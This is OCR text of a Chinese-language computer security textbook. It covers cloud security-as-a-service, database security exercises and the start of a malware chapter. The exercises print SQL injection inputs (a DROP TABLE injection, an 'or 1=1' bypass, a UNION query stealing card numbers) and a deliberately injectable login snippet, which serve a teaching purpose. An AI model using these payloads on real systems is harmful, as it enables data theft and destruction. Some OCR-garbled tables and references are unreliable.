理解 合同 提供 及 其 过 程 的 可 用 性 、 数 据 备份 恢复 以 及 灾难 恢复 ， 并 确保 这 些 要 素 符合 组 织 的 持续 和 应 急 计划 的 
需求 


确保 在 间歇 性 或 持续 的 中 断 或 重大 灾难 期 间 ， 重 要 的 操作 可 以 被 恢复 ,而且 所 有 的 操作 在 一 段 时 间 内 全 部 被 恢复 。 
事件 响应 

理解 有 关 事件 响应 的 合同 提供 及 其 过 程 ， 并 确保 这 些 要 素 符合 组 织 的 需求 。 

确保 在 事件 期 间 和 之 后 ， 云 提供 者 有 完全 透明 化 的 应 对 过 程 和 充分 的 信息 共享 机 制 。 

确保 组 织 能 够 与 云 提供 者 一 同 协调 应 对 事件 ， 以 符合 他 们 在 云 环境 中 的 角色 和 职责 。 


5.11 云 安全 即 服务 


安全 即 服务 的 概念 指 的 是 由 服务 提供 商 提供 的 一 系列 安全 服务 ， 这 些 服务 使 得 安全 服务 提 
供 商 分 担 了 企业 承担 的 大 部 分 的 安全 职责 。 安 全 服务 一 般 包 括 认 证 、 病 毒 防范 、 恶 意 软 件 和 间 
190) 谍 软 件 防范 、 入 侵 检测 以 及 安全 事务 管理 。 在 云 计算 情境 中 ， 云 安全 即 服务 ( Cloud Security as 
a Service, SecaaS) 是 SaaS 的 一 部 分 。 
云 安全 联盟 将 Secaag 定义 为 ， 通 过 云 提供 的 安全 应 用 和 服务 ， 既 可 以 是 交付 给 基于 云 的 
基础 设施 和 软件 ， 也 可 以 是 由 云 交 付 给 云 服务 消费 者 本 地 的 系统 ( 见 表 5-4) [CSA11b]。 
云 安全 联盟 定义 了 如 下 的 SecaaS 服务 分 类 : 
e 身份 和 访问 管理 
e 数据 丢失 防范 
e Web 安全 
e 电子 邮件 安全 


189 


BSE RBFSEZRE 133 


e 安全 性 评估 

e 人 侵 管 理 

e 安全 信息 与 事件 管理 

e 加 密 

e 业务 连续 性 与 灾难 恢复 

e 网 络 安全 

在 本 节 中 ， 我 们 着 重 从 基于 云 的 基础 设施 和 服务 安全 的 角度 研究 这 些 分 类 (如 图 5-15 所 示 )。 

身份 和 访问 管理 ( Identity and Access 
Management, IAM) 包括 用 于 管理 企业 资源 
访问 的 人 力 、 进 程 和 系统 ， 它 确保 访问 实 
体 的 身份 都 经 过 验证 ， 并 授予 了 该 实体 相 
应 的 访问 权限 。 身 份 提 供 是 身份 管理 的 一 
方面 ， 它 为 用 户 提供 了 访问 认证 ， 以 及 当 
企业 客户 端 认 定 该 用 户 不 再 有 云端 企业 资 
源 访问 权限 之 后 ， 可 以 收回 其 访问 权限 或 
者 拒绝 其 访问 。 身 份 管理 的 另 一 个 方面 是 
参与 企业 客户 端 在 云端 使 用 的 联合 身份 方 
R ( 详 见 第 15 章 )。 在 其 他 的 需求 中 ， 云 服 
ZEH (Cloud Service Provider, CSP) 必 
须 能 够 与 企业 所 选择 的 身份 提供 者 就 身份 网 络 安全 


属性 进行 交互 。 

a 
控制 服务 。 例 如 ，CSP 必须 采用 一 个 充分 可 云 服务 客户 与 敌手 
信 的 手段 认证 用 户 。 在 SPI 环境 中 的 访问 控 ss 
制 需求 包括 建立 可 信 的 用 户 档案 和 策略 信 eee oe 
息 ， 使 用 该 档案 信息 进行 云 服 务 中 的 访问 控制 ， 以 及 以 可 审查 的 方式 执行 这 些 流程 。 

数据 泄漏 防护 (Data Loss Prevention, DLP) 是 在 数据 空闲 、 传 输 和 使 用 时 对 数据 进行 监 
控 和 保护 ， 并 验证 其 安全 性 。 大 部 分 DLP 功能 可 被 云 客户 端 实现 ， 这 些 功能 将 在 16.6 节 中 讨 
论 。CSP 同样 可 以 提供 DLP 服务 ， 例 如 在 不 同 场景 中 基于 数据 的 相应 功能 的 实现 规则 。 

Web 安全 是 一 种 实时 保护 ， 这 种 保护 通过 软件 和 应 用 的 安装 或 将 Web 流量 代理 或 重 定位 
至 云 服务 提供 者 来 提供 。 它 相当 于 在 顶端 增加 了 一 层 保护 ， 这 类 似 于 反 病 毒 软 件 ， 用 以 阻止 亚 
` 意 软件 通过 Web 浏览 行为 等 途径 人 侵 企 业 。 为 了 进一步 防范 恶意 软件 ， 基 于 云 的 Web 安全 服 
务 可 能 需要 包含 策略 强制 执行 、 数 据 备份 、 流 量 控制 以 及 Web 访问 控制 等 。 

CSP 可 以 在 需要 安全 措施 的 情况 下 提供 基于 Web 的 电子 邮件 服务 。 电 子 邮件 安全 提供 了 
对 入 站 (inbound) 和 出 站 (outbound) 邮件 的 控制 ， 避 免 组 织 遭 受 钓 鱼 软 件 、 恶 意 附 件 、 强 制 
合约 以 及 垃圾 邮件 的 蓄意 破坏 。CSP 可 在 所 有 电子 邮件 客户 端 中 加 入 数字 签名 并 提供 可 选 的 电 
子 邮件 加 密 服 务 。 

安全 评估 是 第 三 方 对 云 服务 的 审计 。 当 该 服务 超出 CSP 的 职责 范围 时 ，CSP 可 以 提供 工 
具 和 接 入 点 以 便 各 种 审计 行为 的 实施 。 

入 侵 管理 包括 入 侵 检 测 、 防 御 和 响应 。 该 服务 的 核心 是 在 云 接 入 点 和 云 服务 器 上 实现 人 
侵 检 测 系统 (Intrusion Detection System, IDS) 和 入 侵 防御 系统 (Intrusion Prevention System, 
IPS), IDS 是 一 系列 自动 检测 工具 ， 用 于 检测 对 主机 系统 进行 的 未 授权 访问 。 具 体内 容 我 们 会 
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在 第 21 章 中 详细 讨论 。IPS 包含 IDS 的 功能 ， 并 具有 阻 断 人 侵 者 的 通信 流量 的 机 制 。 

安全 信息 与 事件 管理 ( Security Information and Event Management，SIEM) 从 虚拟 或 现实 
的 网 络 、 应 用 和 系统 中 统计 (利用 压 栈 和 弹 栈 机 制 ) 日 志和 事件 数据 。 这 些 统计 要 素 会 被 关联 
起 来 进行 分 析 ， 用 于 就 需要 干预 或 其 他 响应 的 事件 或 信息 ， 提 供 实时 报告 和 警报 。CSP 一 般 会 
将 云端 和 企业 客户 网 络 中 的 信息 汇总 起 来 ， 以 提供 一 个 综合 的 服务 。 

加 密 是 一 种 很 普遍 的 服务 方式 ， 时 常 被 用 于 云端 空闲 数据 、 电 子 邮 件 流量 、 客 户 特定 的 网 
络 管理 信息 以 及 身份 信息 等 。 由 CSP 提供 的 加 密 服 务 会 涉及 一 些 问题 ， 包 括 密 钥 管理 、 如 何 
在 云端 实现 虚拟 专用 网 络 (Virtual Private Network, VPN) 服务 、 应 用 程序 加 密 ， 以 及 访问 数 
据 内 容 等 。 

业务 连续 性 与 灾难 恢复 包括 一 些 措施 和 机 制 ， 它 们 确保 了 在 服务 中 断 时 的 操作 弹性 。 鉴 于 
经 济 因素 ， 这 些 措 施 和 机 制 可 以 彰显 CSP 给 云 服务 客户 端 带 来 的 便利 [WOOD10]。 利 用 可 靠 
的 故障 和 灾难 恢复 设备 ，CSP 可 以 在 多 处 提供 备份 。 该 服务 必须 包括 灵活 的 基础 设施 、 功 能 和 
硬件 元 余 、 监 管 操 作 、 从 地 理 位 置 上 分 配 数据 中 心 ， 以 及 网 络 生存 性 等 内 容 。 

网 络 安全 包括 配置 访问 、 分 配 、 监 管 以 及 保护 底层 资源 等 安全 服务 。 服 务 包括 服务 器 与 
边缘 的 防火 墙 和 拒绝 服务 保护 。 本 节 中 给 出 的 其 他 多 数 服 务 都 属于 网 络 安 全 服务 ， 包 括 入 侵 管 
理 、 身 份 和 访问 管理 、 数 据 丢失 保护 以 及 Web 安全 等 。 


5.12 ”推荐 读物 


[BERT05] 是 关于 数据 库 安 全 的 一 篇 非常 好 的 综述 文献 。 关 于 数据 库 系 统 的 访问 控制 的 两 
篇 综述 文献 是 [BERT95] 和 [LUNT90]。[VIEI05] 分 析 了 特征 化 和 评估 数据 库 系统 安全 机 制 的 
方法 。[DISA05] 是 对 数据 库 安全 主题 的 详细 论述 ， 着 重 分析 了 在 商业 DBMS 中 可 用 的 特征 。 

[CHAN12] 与 [SHAR13] 是 关于 SQLi 攻击 及 其 应 对 措施 的 两 篇 非常 好 的 概述 性 文章 。 

[FARK02] 是 关于 推理 问题 的 简单 介绍 。 要 想 获 得 对 数据 库 简 单 而 有 用 的 介绍 ， 可 以 参见 
[LEYT01]。 关 系数 据 库 的 英 基 概念 来 自 Codd 的 经 典 文章 [CODD70]。 有 关 关 系数 据 库 的 早期 
综述 性 文章 是 [KIM79]。 

[JANS11] 针对 云 安全 性 问题 提出 了 有 价值 且 系 统 性 的 处 理 方案 。 而 [HASS10]、 

[BALA09]、[AHTH10] 和 [CSA11] 都 是 关于 云 安全 问题 具有 独特 视角 的 相关 文章 。 


ANTH10 = Anthes, G. “Security in the Cloud.” Communications of the ACM, Novem- 
ber 2010. 

BALAO9 Balachandra, R.; Ramakrishna, P.; and Rakshit, A. “Cloud Security Issues.” 
Proceedings, 2009 IEEE International Conference on Services Computing, 2009. 

BERT95 Bertino, E.; Jajodia, S.; and Samarati, P. “Database Security: Research and 
Practice.” Information Systems, Vol. 20, No. 7, 1995. 

BERTOS Bertino, E., and Sandhu, R. “Database Security —Concepts, Approaches, 
and Challenges.” JEEE Transactions on Dependable and Secure Comput- 
ing, January—March, 2005. 

CODD70 Codd, E. “A Relational Model of Data for Large Shared Data Banks.” 
Communications of the ACM, June 1970. 

CSA11 Cloud Security Alliance. Security Guidance for Critical Areas of Focus in 
Cloud Computing V2.1. CSA Report, 2011. 

DISA05S Defense Information Systems Agency. Database Security Technical Imple- 
mentation Guide. Department of Defense, November 30, 2005. 
csrc.nist.gov/pcig/ST1Gs/database-stig-v71r2.pdf 

FARK02 Farkas, C., and Jajodia, S. “The Inference Problem: A Survey.” ACM SIG- 
KDD Explorations, Vol. 4, No. 2, 2002. 

HASS10 Hassan, T.; Joshi, J.; and Ahn, G. “Security and Privacy Challenges in 
Cloud Computing Environments.” JEEE Security & Privacy, November/ 
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Jansen, W., and Grance, T. Guidelines on Security and Privacy in Public 


Cloud Computing. NIST Special Publication 800-144, January 2011. 


Jonge, W. “Compromising Statistical Database Responding to Queries 


About Means.” ACM Transactions on Database Systems, March 1983. 


December 2010. 
JANSI1 
JONG83 
KIM79 
LEYT01 

2001. 
LUNT90 

December 1990. 
VIEIO5 


Kim, W. “Relational Database Systems.” Computing Surveys, September 1979. 
Leyton, R. “A Quick Introduction to Database Systems.” ;login, December 


Lunt, T., and Fernandez, E. “Database Security.” ACM SIGMOD Record, 


Vieira, M, and Madeira, H. “Towards a Security Benchmark for Database 


Management Systems.” Proceedings of the 2005 International Conference 
on Dependable Systems and Networks, 2005. 


5.13 ”关键 术语 、 复 习题 和 习题 


关键 术语 


attribute (属性 ) 

blind SQL injection (È SQL HA) 

cascading authorization (级 联 授权 ) 

cloud auditor ( 云 审计 者 ) 

cloud broker ( 云 经 纪 人 ) 

cloud carrier ( 云 运营 商 ) 

cloud computing ( 云 计算 ) 

cloud consumer ( 云 消费 者 ) 

cloud provider ( 云 提 供 者 ) 

cloud security as a service ( 云 安 全 即 服务 ) 

community cloud (社区 云 ) 

compromise (危害) 

data swapping (数据 交换 ) 

database (数据 库 ) 

database access control (数据 库 访问 控制 ) 

database encryption (数据 库 加 密 ) 

database management system ( DBMS ， 数 据 库 管理 
系统 ) 

defensive coding (防御 性 编码 ) 

detection (检测 ) 

end-of-line comment ( 行 末 注 释 ) 

foreign key (外 键 ) 

hybrid cloud (混合 云 ) 

inband attack ( 带 内 攻击 ) 

inference (推理 ) 

inference channel (推理 通道 ) 

inferential attack (推理 攻击 ) 

infrastructure as a service (IaaS ， 基 础 设施 即 服务 ) 


multi-instance model (多 实例 模型 ) 

multi-tenant model (多 租户 模型 ) 

out-of-band attack ( 带 外 攻击 ) 

parameterized query insertion (参数 化 查询 插入 ) 

partitioning (分 割 ) 

piggybacked queries (H£) 

platform as a service (PaaS ， 平 台 即 服务 ) 

primary key (主键 ) 

private cloud (WAZ) 

public cloud (公有 云 ) 

query language (查询 语言 ) 

query set (查询 集 ) 

relation (关系 ) 

relational database (关系 型 数据 库 ) 

relational database management system (RDBMS, 
关系 型 数据 库 管 理 系统 ) 

run-time prevention (运行 时 防御 ) 

security as a service (SecaaS， 安 全 即 服 务 ) 

service aggregation (RARA) 

service arbitrage (服务 套利 ) 

service intermediation (服务 中 介 ) 

software as a service (SaaS ， 软 件 即 服务 ) 

Structured Query Lanauage (SQL ， 结 构 化 查询 语言 ) 

SQL injection (SQLi) attack (SQL 注入 攻击 ) 

tautology ( 重 言 式 ) 

tuple (元 组 ) 

view (视图 ) 
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复习 题 


5.1 
5.2 
5.3 
5.4 
5.5 
5.6 
5.7 
5.8 
5.9 


解释 下 列 术语 : 数据 库 、 数 据 库 管理 系统 和 查询 语言 。 
什么 是 关系 数据 库 ? 它 的 主要 组 成 要 素 是 什么 ? 

关系 数据 库 中 ， 一 个 表 可 以 有 多 少 个 主键 和 多 少 个 外 键 ? 
列 出 并 简要 描述 RDBMS 可 以 使 用 的 管理 策略 。 
解释 级 联 授 权 的 概念 。 

解释 RDBMS 的 推理 威胁 的 本 质 。 

数据 库 加 密 的 缺点 是 什么 ? 

列 出 并 简要 定义 三 种 云 服务 模型 。 

什么 是 云 计 算 的 参考 架构 ? 


5.10 ”描述 一 些 主要 的 针对 云 的 安全 威胁 。 
习题 


5.1 


考虑 一 个 简化 的 大 学 数据 库 ， 其 中 包括 关于 课程 《名 字 、 编 号 、 日 期 、 时 间 、 房 间 号 、 最 大 注册 人 
数 )、 讲 课 的 教师 和 听课 的 学 生 的 信息 。 给 出 一 个 有 效 管理 这 些 信息 的 关系 数据 库 。 


5.2 下 表 提 供 了 一 个 登山 俱乐部 成 员 的 信息 。 





Climber-ID 


主键 是 Climber-ID。 解 释 下 面 各 行 能 和 否 被 添加 到 表 中 。 


Climber-ID SkilHlevel 
D a 





td. P 


Dog 
Cat 
Wooley ozon sro 


a. 描述 使 用 这 个 表 时 可 能 出 现 的 四 个 问题 。 
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b. 把 这 个 表 分 解 成 两 个 表 ， 以 解决 上 述 提 到 的 四 个 问题 。 
5.4 ”我们 想 要 创建 Student 表 ， 其 中 包括 学 生 ID 号 、 姓 名 和 电话 号 码 。 写 出 实现 这 个 功能 的 SQL 语句 。 
5.5 考虑 如 下 的 SQL 语句 : 
SELECT id forename, surname FROM authors WHERE forename='john' AND 
Surname ='smith' 
a. 该 SQL 语句 要 做 什么 事情 ? 
b. 假设 forename 和 surname 字段 是 从 用 户 提供 的 输入 中 提取 的 ， 如 果 用 户 的 应 答 分 别 是 
Forename: jo' hn 
Surname: smith 
这 对 查询 的 影响 是 什么 ? 
c. 现在 如 果 假 定 用 户 的 应 答 是 : 
Forename: jo'; drop table authors-- 
Surname: smith 
这 样 做 对 查询 的 影响 是 什么 ? 
5.6 图 5-16 是 一 段 代码 ， 其 目标 是 实现 对 某 个 数据 库 应 用 程序 的 登录 功能 。 这 段 代 码 动 态 地 构建 了 一 个 
SQL 查询 并 提交 给 数据 库 。 
a. 假设 用 户 提 交 了 登录 的 用 户 名 、 密 码 和 个 人 识别 码 ， 分 别 是 : doe、secret 和 123。 给 出 所 需要 的 
SQL 查询 语句 。 
b. 如 果 用 户 给 login 字段 提交 的 是 'or 1 二 1--， 这 时 对 查询 结果 的 影响 是 什么 ? 
. String login, password, pin, query 
. login = getParameter (“login”); 
. password = getParameter (“pass”); 
. pin = getParameter (“pin”); 
. Connection conn.createConnection ("MyDataBase” ) ; 
. query = “SELECT accounts FROM users WHERE login='” + 
login + “‘AND pass='”" + password + 
“CAND pin=” + pin; 
. ResultSet result = conn.executeQuery (query) ; 
. if (result !=NULL) 
10 displayAccounts (result); 


11 else 
12 displayAuthFailed() ; 


图 5-16 产生 SQL 查询 的 代码 段 


5.7 SQL 命令 字 UNION 是 用 于 合并 两 个 或 多 个 SQL SELECT 语句 的 选择 结果 的 。 在 如 图 5-16 所 
示 的 登录 代码 中 ， 假 设 用 户 在 登录 字段 中 键入 的 内 容 如 下 : 
'UNION SELECT cardNo from CreditCards WHERE acctNo=10032-- 
结果 如 何 ? 

5.8 假定 A、B 和 C 把 Employee 表 的 某 些 特权 授予 X，X 又 把 这 些 特权 授予 Y， 如 下 表 所 示 ， 其 中 的 
数值 项 表示 授权 的 时 间 : 


I 
2 
3 
3 
4 
5 
6. 
Vx 
8 


wo 





Employee 





197 


138 B-RA HHEMKARKSRE 


在 1=35 时 刻 ，B 发 出 命令 REVOKE ALL RIGHTS ON Employee FROM X。 使 用 5.2 节 定 义 的 约定 ， 
Y 的 哪些 访问 权 必 须 被 收回 (如 果 有 的 话 ) ? 

5.9 图 5-17 给 出 了 一 个 表 的 指定 访问 权 的 授权 操作 序列 。 假 定 在 t=70 时 刻 ，B 收回 C 的 访问 权 。 使 用 
5.2 节 定义 的 约定 ， 给 出 访问 权 依赖 的 结果 图 。 





图 5-17 级 联 特权 
5.10 5-18 给 出 了 图 5-6 所 示 情 况 的 回收 处 理 的 另 一 种 约定 。 





图 5-18 Bob 收回 David 的 特权 ， 第 二 版 


a. 描述 符合 这 张 图 的 回收 算法 。 
b. 比较 这 种 方法 与 图 5-6 所 示 原 始 方法 的 相对 优点 和 缺点 。 

5.11 考虑 一 个 管道 工程 公司 的 零件 部 门 。 该 部 门 维护 一 个 库存 数据 库 ， 其 中 包括 零件 信息 (零件 号 、 描 
述 信息 、 颜 色 、 尺 寸 、 库 存 数 等 ) 和 供应 商 信息 (名字 、 地 址 、 待 办 采购 单 、 已 结案 采购 单 等 )。 
在 RBAC 系统 中 ， 假 设 为 应 付 员 、 安 装 组 长 和 收 货 员 分 别 定义 角色 。 对 每 种 角色 ， 指 出 可 以 只 读 
和 读 写 访问 哪些 数据 项 。 

5.12 ”假设 你 是 一 个 军事 运输 系统 的 数据 库 管理 员 。 在 你 的 数据 库 中 有 一 个 名 为 “货物 ”的 表 ， 其 中 包 
含 每 架 出 发 飞机 里 装载 的 各 种 货物 的 信息 。 表 中 的 每 行 表示 一 批 货物 ， 并 列 出 了 该 批 货物 的 内 容 
和 航班 标识 号 。 每 个 货舱 仅 被 允许 装 一 批 货物 。 航 班 标识 号 可 以 与 其 他 表 交 叉 参 照 ， 以 确定 出 发 
地 、 目 的 地 、 航 班 时 刻 及 其 他 类 似 数据 。 货 物 表 如 下 : 


假设 定义 两 个 角色 : 角色 1 具有 对 货物 表 的 完全 访问 权 ， 角 色 2 仅 对 Classification 字段 的 值 为 
Unclassified 的 行 具有 完全 访问 权 。 描 述 一 个 情景 : 被 分 配 了 角色 2 的 用 户 可 以 通过 一 个 或 多 个 查 





5.13 


5.14 


5.15 
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询 确 定 装 人 飞机 的 货物 中 是 否 包含 机 密 货物 。 

FA hulkhogan 和 undertaker 不 具有 对 Inventory 表 和 Item 表 的 SELECT 访问 权 。 这 些 表 是 由 用 户 
bruno-s 创建 和 拥有 的 。 写 出 能 使 bruno-s 向 hulkhogan 和 undertaker 授予 对 这 些 表 的 SELECT 访问 
权 的 SQL 命令 。 

在 5.6 节 中 列举 的 例子 提 到 在 定义 职工 信息 的 一 组 表 中 增加 Start-Date 列 的 问题 ， 一 种 直接 除去 推 
理 通道 的 方法 是 将 Start-Date 列 加 到 Employees 表 。 提 出 另外 一 种 办 法 。 

考虑 包括 工资 属性 的 数据 库 表 。 假 定 三 个 查询 sum、count 和 max ( 按 此 顺序 ) 针对 工资 属性 做 出 ， 
所 有 查询 中 涉及 其 他 属性 的 谓词 逻辑 都 相同 。 也 就 是 说 ， 选 出 一 个 特定 的 记录 子 集 ， 三 个 查询 都 
在 该 子 集 上 执行 。 假 设 前 两 个 查询 被 回答 ， 第 三 个 查询 被 拒绝 。 有 信息 被 泄漏 吗 ? 


第 6 章 | 


Computer Security: Principles and Practice, Third Edition 


恶意 软件 





学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

o 描述 恶意 软件 所 使 用 的 三 类 传染 机 制 ; 
© 理解 病毒 、 蠕 虫 和 木马 的 基本 运行 方式 ; 


© 描述 恶意 软件 的 四 种 载荷 ; 

@ 理解 僵尸 程序 、 间 谍 软 件 和 rootkit 导致 的 不 同 威胁 ; 
o 描述 对 恶意 软件 的 应 对 措施 的 部 分 组 成 要 素 ; 

© 描述 部 署 恶 意 软件 检测 机 制 的 三 个 位 置 。 


恶意 软件 大 概 是 所 有 对 计算 机 系统 的 威胁 中 最 重要 的 一 类 。[SOUP 13] 将 恶意 软件 定义 
为 “一 种 被 (往往 是 秘密 地 ) 植 人 系统 中 ， 以 损害 受害 者 数据 、 应 用 程序 或 操作 系统 的 可 信 性 、 
完整 性 或 可 用 性 ， 抑 或 对 用 户 实施 骚扰 或 妨碍 的 程序 ” 。 因 此 ， 我 们 需要 关注 亚 意 软件 对 应 用 
程序 、 实 用 程序 ( utility program， 如 编辑 器 和 编译 器 等 ) 以 及 内 核 级 ( kernel-level) 程序 的 威 
胁 。 我 们 同时 还 关注 恶意 软件 在 被 俘获 的 或 是 恶意 网 站 和 服务 器 上 的 使 用 ， 或 者 其 在 特别 打造 
的 用 以 诱骗 用 户 透 漏 敏感 个 人 信息 的 垃圾 邮件 及 其 他 信息 中 的 应 用 。 

本 章 将 详细 阐述 恶意 软件 的 威胁 和 我 们 的 对 策 。 本 章 首先 综述 恶意 软件 的 各 种 类 型 ， 然 后 
通过 恶意 软件 的 传播 感染 途径 和 其 行为 或 有 效 载荷 ( payload) 给 予 其 一 个 广泛 的 分 类 。 传 染 机 
制 包括 了 病毒 蠕虫 和 木马 的 传染 方式 。 有 效 负载 包括 系统 损坏 、 僵 尸 程序 、 网 络 钓鱼 、 间 谍 
软件 rootkit。 本 章 还 会 介绍 一 些 对 抗 恶意 软件 的 措施 。 


6.1 恶意 软件 的 类 型 


在 这 个 领域 中 ， 术 语 的 使 用 存在 着 一 些 问 题 。 这 是 因为 缺少 对 这 些 术 语 的 通用 约定 ， 而 同 
时 又 存在 着 某 些 类 别 的 交 释 。 表 6-1 列 出 了 有 助 于 理解 这 些 术 语 的 描述 。 


表 6-1 恶意 软件 的 相关 术语 





名 称 描 述 

指向 商业 性 和 政治 性 目标 、 使 用 多 种 入 侵 技术 和 恶意 软件 并 在 很 长 一 段 时 间 内 发 
高 级 持续 性 威胁 (APT) | 起 持续 有 效 的 攻击 的 网 络 犯罪 ， 其 元 凶 往 往 是 由 国家 支持 的 组 织 
eT ee ENIE EEE, NPA Ra OE REPL 
攻击 工具 包 (attack kit) 一 套 通过 使 用 各 种 传播 和 载荷 机 制 自动 生成 新 恶意 软件 的 工具 
Auto-rooter 用 于 远程 人 侵 到 新 的 机 器 上 的 恶意 攻击 工具 
后 门 ( 陷 门 ) 能 够 绕 过 正常 安全 检查 的 任何 机 制 ， 它 可 以 允许 未 经 授权 访问 某 些 功能 
pr 在 被 攻击 的 机 器 上 安装 其 他 内 容 的 程序 。 通 常 下 载 器 是 包含 在 恶意 代码 中 的 ， 该 


恶意 代码 首先 被 安装 在 被 感染 系统 中 ， 而 后 下 载 大 量 的 恶意 软件 


wae 一 种 利用 被 俘获 网 站 的 攻击 方式 。 当 该 网 站 被 访问 时 ， 被 植 和 其 中 的 恶意 代码 可 
夹带 式 下 载 (divebydownload) | 以 利用 浏览 器 中 的 漏洞 攻击 访问 者 所 在 的 系统 


名 R 
漏洞 攻击 程序 (exploit) 
洪 泛 攻击 程序 (flooder) 
键盘 记录 器 (keylogger) 
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( 续 ) 
a OR 
针对 某 个 或 多 个 漏洞 进行 攻击 的 代码 
通过 向 联网 的 计算 机 系统 发 送 大 量 数据 包 而 实现 拒绝 服务 攻击 的 程序 


捕获 受 控 系统 中 键盘 输入 的 程序 
被 入侵 者 插入 到 正常 软件 中 的 程序 。 当 预定 义 的 条 件 满足 时 ， 逻 辑 炸 弹 被 触发 ， 


逻辑 炸弹 开始 执行 非 授权 的 操作 ;其 他 时 间 处 于 休眠 状态 
s 一 种 使 用 宏 或 脚本 语言 编写 的 病毒 ， 通 常 被 植 人 到 一 个 文档 中 ， 当 该 文档 被 浏览 
或 编辑 时 被 触发 和 运行 ， 然 后 复制 自身 至 其 他 的 文档 
能 够 不 加 修改 地 移植 到 不 同类 型 的 系统 平台 上 并 按照 完全 相同 的 语义 执行 的 软件 
(如 脚本 、 宏 或 其 他 可 移植 的 指令 ) 
rootkit 攻击 者 成 功 入 侵 计 算 机 系统 并 获得 root 访问 权限 之 后 使 用 的 一 套 攻击 工具 
垃圾 邮件 程序 发 送 大 量 垃圾 邮件 的 程序 
i 通过 监听 键盘 输入 、 显 示 器 数据 或 网 络 流量 ， 或 通过 搜寻 系统 中 的 文件 获取 敏感 
PYN 信息 ， 并 将 收集 到 的 信息 发 送 给 另 一 台 计算 机 的 软件 
一 种 计算 机 程序 ， 看 上 去 具有 有 用 的 功能 ， 但 还 具有 隐蔽 的 、 潜 在 的 恶意 功能 ， 
特洛伊 木马 这 些 恶意 功能 可 以 用 来 避 开 安全 机 制 的 检查 ， 有 时 是 利用 调用 被 感染 系统 的 合法 授 
权 来 实现 的 
oe 当 其 执行 时 ， 设 法 将 自己 复制 到 其 他 可 执行 代码 中 的 恶意 软件 。 如 果 复 制 成 功 ， 
就 称 这 个 可 执行 代码 被 感染 了 。 当 被 感染 的 可 执行 代码 运行 时 ， 病 毒 也 同时 被 执行 
Eh 能 够 独立 执行 并 且 可 以 将 自己 完整 的 可 执行 版 本 传播 到 网 络 中 其 他 主机 上 的 计算 


机 程序 ， 通 常 通过 攻击 目标 系统 中 软件 的 漏洞 实现 


{F (zombie, bot) 在 被 感染 的 计算 机 中 运行 ， 激 活 后 向 其 他 计算 机 发 动 攻击 的 程序 


6.1.1 一 个 粗略 的 分 类 


许多 作者 试图 对 恶意 软件 进行 分 类 ， 参 见 调查 报告 和 建议 书 [HANS04]。 即 使 现在 有 很 多 
分 类 方法 ,但 是 一 个 最 有 效 的 分 类 方法 是 将 其 分 为 两 个 大 类 : 一 是 基于 其 向 目标 传播 和 感染 的 
方式 进行 分 类 ; 二 是 在 到 达 目 标 后 ， 基 于 其 工作 方式 或 有 效 负载 进行 分 类 。 

传播 机 制 ， 包 括 对 现 有 可 执行 程序 的 感染 或 由 病毒 翻译 并 随后 传播 至 其 他 系统 的 内 容 ; 利 
用 软件 漏洞 (无 论 是 从 本 地 发 起 或 借助 蠕虫 、 夹 带 式 下 载 等 方式 从 网 络 发 起 ) 来 允许 恶意 软件 
自我 复制 ; 以 及 借助 社会 工程 学 方法 说 服用 户 绕 过 安全 机 制 来 安装 木马 或 响应 网 络 钓鱼 。 

早 些 时 候 的 恶意 软件 分 类 方法 ， 是 依据 恶意 软件 是 否 依附 于 宿主 程序 ， 如 病毒 需要 一 个 宿 
主 程序 寄生 ， 而 蠕虫 、 木 马 和 僵尸 程序 可 以 独立 运行 在 系统 上 。 其 他 在 用 的 区 分 方法 ， 是 该 恶 
意 软 件 是 否 可 以 自我 复制 ， 如 木马 或 垃圾 电子 邮件 就 无 法 自我 复制 ， 而 病毒 和 蠕虫 则 相反 。 

恶意 软件 一 旦 到 达 目 标 系 统 ， 其 将 表现 出 的 有 效 载荷 的 行为 可 能 包括 污染 系统 或 数据 文 
件 ; 窃取 服务 使 系统 成 为 僵尸 网 络 中 的 一 个 僵尸 代理 ; 窃取 系统 信息 ， 特 别 是 登录 口令 和 通 
过 键盘 记录 器 或 间谍 软件 获取 的 隐私 信息 ; 以 及 隐蔽 恶意 软件 的 存在 以 防止 其 被 系统 检测 和 
锁定 。 

早期 的 亚 意 软件 往往 使 用 单一 的 传染 方法 传播 单一 的 有 效 载荷 。 随 着 病毒 技术 的 发 展 进 
化 ， 我 们 发 现存 在 许多 混合 型 的 恶意 软件 ， 它 们 存在 多 种 传播 机 制 和 有 效 载荷 ， 这 增加 了 其 在 
目标 中 传播 和 隐藏 的 能 力 ， 并 表现 出 一 系列 的 行为 。 混 合 攻击 ( belended attack) 使 用 了 多 种 传 
播 感染 手段 ， 最 大 化 其 危害 蔓延 的 速度 和 攻击 的 严重 程度 。 一 些 恶 意 软件 甚至 存在 一 种 更 新 机 
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制 ， 一 旦 被 部 署 ， 它 可 以 改变 传播 机 制 和 有 效 载 荷 。 
在 接 下 来 的 小 节 中 ， 我 们 将 研究 多 类 恶意 软件 ， 然 后 对 相应 的 对 抗 手段 进行 讨论 。 


6.1.2 攻击 工 具 包 


最 初 ， 恶 意 软件 是 软件 编写 者 为 炫 炊 技术 而 开发 和 部 署 的 。 在 20 世纪 90 年 代 早 期 ， 随 
着 病毒 工具 开发 包 的 出 现 改变 了 这 种 情况 ， 而 后 在 21 世纪 出 现 了 更 多 通用 的 攻击 包 ， 这 些 攻 
击 包 在 极 大 程度 上 助长 了 恶意 软件 的 开发 和 部 署 [FEFOSS10]。 这 些 工具 包 通 常 被 称 为 犯罪 软件 
(crimeware)， 其 包含 了 多 种 传播 机 制 和 有 效 载荷 模块 ， 即 使 新 手 菜鸟 也 可 以 进行 组 合 、 选 择 和 
部 署 。 工 具 包 也 可 以 通过 最 新 发 现 的 漏洞 定制 恶意 软件 ， 在 该 漏洞 被 发 现 到 被 补丁 修复 前 这 段 
时 间 内 进行 漏洞 攻击 。 这 些 工具 包 显 著 地 增加 了 有 能 力 部 署 恶意 软件 的 攻击 者 的 数量 。 虽 然 这 
些 工具 包 制 作 的 恶意 软件 往往 不 如 那些 精心 设计 的 恶意 软件 复杂 巧妙 ， 其 所 生成 的 恶意 软件 变 
种 的 绝对 数量 仍然 会 给 对 抗 它们 的 防御 系统 造成 相当 大 的 麻烦 。 

Zeus 犯罪 软件 工具 包 是 攻击 包 中 一 个 突出 的 、 最 新 的 和 典型 的 例子 。 利 用 Zeus TRE, 
制作 出 了 很 多 非常 高 效 隐秘 的 恶意 软件 ， 其 助长 了 很 多 犯罪 活动 ， 如 截获 和 攻击 银行 信用 卡 信 
